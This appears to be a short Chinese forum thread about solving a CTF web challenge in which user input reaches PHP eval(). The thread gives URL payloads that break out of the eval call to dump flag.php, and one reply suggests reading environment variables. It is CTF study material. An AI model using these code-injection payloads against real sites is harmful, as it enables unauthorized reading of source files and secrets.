xuenixiang_2018_web_baohan
eval存在执行漏洞,使用hello构造payload?hello=1);show_source(%27flag.php%27);var_dump(3
不能执行bash指令,但是调用php的函数就好了。还是注入eval( “var_dump($a);”); 这句话。payload如下
http://xuenixiang.cn/hello?hello=);print_r(file("./flag.php")); //
http://xuenixiang.cn:28018/?hello=123456);print_r(file(%27./flag.php%27)请教一下,我输入之后没有发现flag 。是不是有什么地方不对呢? 天象独行 发表于 2020-11-14 19:38
http://xuenixiang.cn:28018/?hello=123456);print_r(file(%27./flag.php%27)请教一下,我输入之后没有发 ...
可以试试读取环境变量env
页:
[1]